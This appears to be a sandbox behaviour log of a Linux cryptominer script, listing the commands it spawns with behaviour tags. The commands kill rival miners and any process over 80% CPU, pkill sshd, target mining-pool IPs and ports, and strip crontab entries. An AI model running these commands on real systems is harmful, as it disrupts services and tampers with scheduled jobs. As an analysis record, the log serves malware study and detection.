/usr/bin/awkawk "{print \$2}"2⤵PID:1479
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1476
-
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
PID:1482
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1481
-
-
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
PID:1484
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1483
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1488
-
-
/bin/grepgrep -v grep2⤵PID:1487
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1489
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1486
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1485
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1493
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1494
-
-
/bin/grepgrep -v grep2⤵PID:1492
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1491
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1490
-
-
/bin/grepgrep -v grep2⤵PID:1497
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1499
-
-
/bin/grepgrep "bash -k"2⤵PID:1496
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1498
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1495
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1503
-
-
/bin/grepgrep -v grep2⤵PID:1502
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1504
-
-
/bin/grepgrep perfctl2⤵PID:1501
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1500
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1507
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1508
-
-
/bin/grepgrep 185.71.65.2382⤵PID:1506
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1509
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1513
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1512
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1514
-
-
/bin/grepgrep 140.82.52.872⤵PID:1511
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1518
-
-
/bin/grepgrep -v -2⤵PID:1519
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1520
-
-
/bin/grepgrep 207.38.87.62⤵PID:1516
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1517
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1524
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1523
-
-
/bin/grepgrep -v -2⤵PID:1525
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1522
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1526
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1530
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1529
-
-
/bin/grepgrep -v -2⤵PID:1531
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1532
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1528
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1535
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1536
-
-
/bin/grepgrep -v -2⤵PID:1537
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1534
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1538
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1539
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1540
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵
- Reads runtime system information
PID:1543
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1544
-
-
/bin/grepgrep -v grep2⤵PID:1542
-
-
/bin/grepgrep agetty2⤵PID:1541
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1545
-
-
/bin/sedsed /192.81.212.13/d2⤵PID:1547
-
-
/usr/bin/crontabcrontab -l2⤵PID:1546
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1548
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1551
-
-
/bin/sedsed /base64/d2⤵PID:1550
-
-
/usr/bin/crontabcrontab -l2⤵PID:1549
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1554
-
-
/bin/sedsed /python/d2⤵PID:1553
-
-
/usr/bin/crontabcrontab -l2⤵PID:1552
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1557
-
-
/bin/sedsed /shm/d2⤵PID:1556
-
-
/usr/bin/crontabcrontab -l2⤵PID:1555
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1560
-
-
/bin/sedsed /postgresql/d2⤵PID:1559
-
-
/usr/bin/crontabcrontab -l2⤵PID:1558
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1563
-
-
/bin/sedsed /cloudfronts/d2⤵PID:1562
-
-
/usr/bin/crontabcrontab -l2⤵PID:1561
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1566
-
-
/bin/sedsed /sshd/d2⤵PID:1565
-
-
/usr/bin/crontabcrontab -l2⤵PID:1564
-
-
/bin/sedsed /linux/d2⤵PID:1568
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1569
-
-
/usr/bin/crontabcrontab -l2⤵PID:1567
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1572
-
-
/bin/sedsed /neoogilvy/d2⤵PID:1571
-
-
/usr/bin/crontabcrontab -l2⤵PID:1570
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1575
-
-
/bin/sedsed /rsync/d2⤵PID:1574
-
-
/usr/bin/crontabcrontab -l2⤵PID:1573
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1578
-
-
/bin/sedsed /bpdeliver/d2⤵PID:1577
-
-
/usr/bin/crontabcrontab -l2⤵PID:1576
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1581
-
-
/bin/sedsed /perfcc/d2⤵PID:1580
-
-
/usr/bin/crontabcrontab -l2⤵PID:1579
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1584
-
-
/bin/sedsed /atdb/d2⤵PID:1583
-
-
/usr/bin/crontabcrontab -l2⤵PID:1582
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1585
-
-
/usr/bin/pkillpkill -f htop2⤵PID:1586
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1588
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
PID:1589
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1590
-
-
/usr/bin/pkillpkill -f sysupdater2⤵PID:1591
-
-
/usr/bin/pkillpkill -f php-update.service2⤵PID:1592
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads runtime system information
PID:1593
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1596
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1597
-
-
/bin/grepgrep :14142⤵PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1599
-
-
/bin/grepgrep -v -2⤵PID:1598
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1602
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1601
-
-
/bin/grepgrep -v -2⤵PID:1604
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1605
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1603
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1608
-
-
/bin/grepgrep -v -2⤵PID:1610
-
-
/bin/grepgrep :1432⤵PID:1607
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1611
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1609
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1615
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1614
-
-
/bin/grepgrep -v -2⤵PID:1616
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1617
-
-
/bin/grepgrep :22222⤵PID:1613
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1621
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1620
-
-
/bin/grepgrep :33332⤵PID:1619
-
-
/bin/grepgrep -v -2⤵PID:1622
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1623
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1627
-
-
/bin/grepgrep -v -2⤵PID:1628
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1629
-
-
/bin/grepgrep :33892⤵PID:1625
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1626
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1632
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1633
-
-
/bin/grepgrep :44442⤵PID:1631
-
-
/bin/grepgrep -v -2⤵PID:1634
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1635
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1639
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1638
-
-
/bin/grepgrep -v -2⤵PID:1640
-
-
/bin/grepgrep :55552⤵PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1641
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1644
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1645
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1647
-
-
/bin/grepgrep :66662⤵PID:1643
-
-
/bin/grepgrep -v -2⤵PID:1646
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1650
-
-
/bin/grepgrep :66652⤵PID:1649
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1653
-
-
/bin/grepgrep -v -2⤵PID:1652
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1651
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1656
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1657
-
-
/bin/grepgrep -v -2⤵PID:1658
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1659
-
-
/bin/grepgrep :66672⤵PID:1655
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1663
-
-
/bin/grepgrep :77772⤵PID:1661
-
-
/bin/grepgrep -v -2⤵PID:1664
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1665
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1662
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1669
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1668
-
-
/bin/grepgrep :84442⤵PID:1667
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1671
-
-
/bin/grepgrep -v -2⤵PID:1670
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1675
-
-
/bin/grepgrep -v -2⤵PID:1676
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1674
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1677
-
-
/bin/grepgrep :33472⤵PID:1673
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1681
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1680
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1683
-
-
/bin/grepgrep :144442⤵PID:1679
-
-
/bin/grepgrep -v -2⤵PID:1682
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1687
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1686
-
-
/bin/grepgrep :144332⤵PID:1685
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1689
-
-
/bin/grepgrep -v -2⤵PID:1688
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1692
-
-
/bin/grepgrep -v -2⤵PID:1694
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1695
-
-
/bin/grepgrep :135312⤵PID:1691
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1693
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵PID:1696
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1698
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1697
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1699
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1701
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1700
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵PID:1702
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1703
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1704
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵PID:1705
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1707
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1706
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵PID:1708
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1710
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1709
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵PID:1711
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1713
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1712
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1714
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1715
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1716
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵PID:1717
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1719
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1718
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵PID:1720
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1722
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1721
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵PID:1723
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1725
-
-
/bin/catcat /data/./oka.pid2⤵PID:1724
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵PID:1726
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1728
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1727
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵PID:1729
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1731
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1730
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1732
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1733
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1734
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads runtime system information
PID:1735
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1736
-
-
/usr/bin/pkillpkill -f zsvc2⤵PID:1737
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵PID:1738
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵PID:1739
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads runtime system information
PID:1740
-
-
/usr/bin/pkillpkill -f dbused2⤵PID:1741
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads runtime system information
PID:1742
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1743
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
PID:1744
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1745
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵PID:1746
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1747
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1748
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1749
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1750
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1751
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads runtime system information
PID:1752
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads runtime system information
PID:1753
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1754
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads runtime system information
PID:1755
-
-
/usr/bin/pkillpkill -f c3pool2⤵PID:1756
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
PID:1757
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1758
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads runtime system information
PID:1759
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵PID:1760
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1761
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1762
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1763
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1764
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1768
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1769
-
-
/bin/grepgrep ./udp2⤵PID:1766
-
-
/bin/grepgrep -v grep2⤵PID:1767
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1765
-
-
/bin/grepgrep -v grep2⤵PID:1772
-
-
/bin/grepgrep ./oka2⤵PID:1771
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1773
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1774
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1770
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1778
-
-
/bin/grepgrep -v grep2⤵PID:1777
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1779
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1776
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1775
-
-
/bin/grepgrep -v "\\["2⤵PID:1783
-
-
/bin/grepgrep -v "("2⤵PID:1784
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1781
-
-
/bin/grepgrep -v php-fpm2⤵PID:1785
-
-
/bin/grepgrep -v proxymap2⤵PID:1786
-
-
/bin/psps ax -o "command,pid" -www2⤵PID:1780
-
-
/bin/grepgrep -v bin2⤵PID:1782
-
-
/bin/grepgrep -v postgres2⤵PID:1787
-
-
/bin/grepgrep -v postgrey2⤵PID:1788
-
-
/bin/grepgrep -v kinsing2⤵PID:1789
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1791
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1790
-
-
/bin/grepgrep -v "("2⤵PID:1796
-
-
/bin/grepgrep -v bin2⤵PID:1794
-
-
/bin/grepgrep -v php-fpm2⤵PID:1797
-
-
/bin/grepgrep -v proxymap2⤵PID:1798
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1793
-
-
/bin/grepgrep -v "\\["2⤵PID:1795
-
-
/bin/grepgrep -v postgres2⤵PID:1799
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads runtime system information
PID:1792
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1801
-
-
/bin/grepgrep -v postgrey2⤵PID:1800
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1802
-
-
/bin/grepgrep -v bin2⤵PID:1805
-
-
/bin/grepgrep -v "\\["2⤵PID:1806
-
-
/bin/grepgrep -v "("2⤵PID:1807
-
-
/bin/psps ax2⤵
- Reads runtime system information
PID:1803
-
-
/bin/grepgrep -v proxymap2⤵PID:1809
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1804
-
-
/bin/grepgrep -v php-fpm2⤵PID:1808
-
-
/bin/grepgrep -v postgres2⤵PID:1810
-
-
/bin/grepgrep -v postgrey2⤵PID:1811
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1812
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1813
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1817
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1818
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1816
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1814
-
-
/bin/grepgrep -v grep2⤵PID:1815
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1823
-
-
/bin/grepgrep "sleep 60"2⤵PID:1820
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1822
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1819
-
-
/bin/grepgrep -v grep2⤵PID:1821
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1828
-
-
/bin/grepgrep -v grep2⤵PID:1826
-
-
/bin/grepgrep ./crun2⤵PID:1825
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1827
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1824
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1832
-
-
/bin/grepgrep -v grep2⤵PID:1831
-
-
/bin/grepgrep -vw kdevtmpfsi2⤵PID:1830
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1829
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1833
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1838
-
-
/bin/grepgrep :33332⤵PID:1836
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1837
-
-
/bin/grepgrep -v grep2⤵PID:1835
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1834
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1843
-
-
/bin/grepgrep :55552⤵PID:1841
-
-
/bin/grepgrep -v grep2⤵PID:1840
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1842
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1839
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1847
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1848
-
-
/bin/grepgrep "kworker -c\\"2⤵PID:1846
-
-
/bin/grepgrep -v grep2⤵PID:1845
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1844
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1852
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1853
-
-
/bin/grepgrep log_2⤵PID:1851
-
-
/bin/grepgrep -v grep2⤵PID:1850
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1849
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1857
-
-
/bin/grepgrep systemten2⤵PID:1856
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1854
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1858
-
-
/bin/grepgrep -v grep2⤵PID:1855
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1863
-
/usr/local/sbin/killkill -9 103⤵PID:1864
-
-
/usr/local/bin/killkill -9 103⤵PID:1864
-
-
/usr/sbin/killkill -9 103⤵PID:1864
-
-
/usr/bin/killkill -9 103⤵PID:1864
-
-
/sbin/killkill -9 103⤵PID:1864
-
-
/bin/killkill -9 103⤵PID:1864
-
-
-
/bin/grepgrep -v grep2⤵PID:1860
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1862
-
-
/bin/grepgrep netns2⤵PID:1861
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1859
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1868
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1869
-
-
/bin/grepgrep voltuned2⤵PID:1867
-
-
/bin/grepgrep -v grep2⤵PID:1866
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1865
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1873
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1874
-
-
/bin/grepgrep darwin2⤵PID:1872
-
-
/bin/grepgrep -v grep2⤵PID:1871
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1870
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1878
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1879
-
-
/bin/grepgrep /tmp/dl2⤵PID:1877
-
-
/bin/grepgrep -v grep2⤵PID:1876
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1875
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1883
-
-
/bin/grepgrep /tmp/ddg2⤵PID:1882
-
-
/bin/grepgrep -v grep2⤵PID:1881
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1884
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1880
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1888
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1889
-
-
/bin/grepgrep -v grep2⤵PID:1886
-
-
/bin/grepgrep /tmp/pprt2⤵PID:1887
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1885
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1894
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1893
-
-
/bin/grepgrep /tmp/ppol2⤵PID:1892
-
-
/bin/grepgrep -v grep2⤵PID:1891
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1890
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵PID:1897
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1899
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1898
-
-
/bin/grepgrep -v grep2⤵PID:1896
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1895
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1900
-
-
/bin/grepgrep -v grep2⤵PID:1901
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1903
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1904
-
-
/bin/grepgrep "/tmp/jmx*"2⤵PID:1902
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1908
-
-
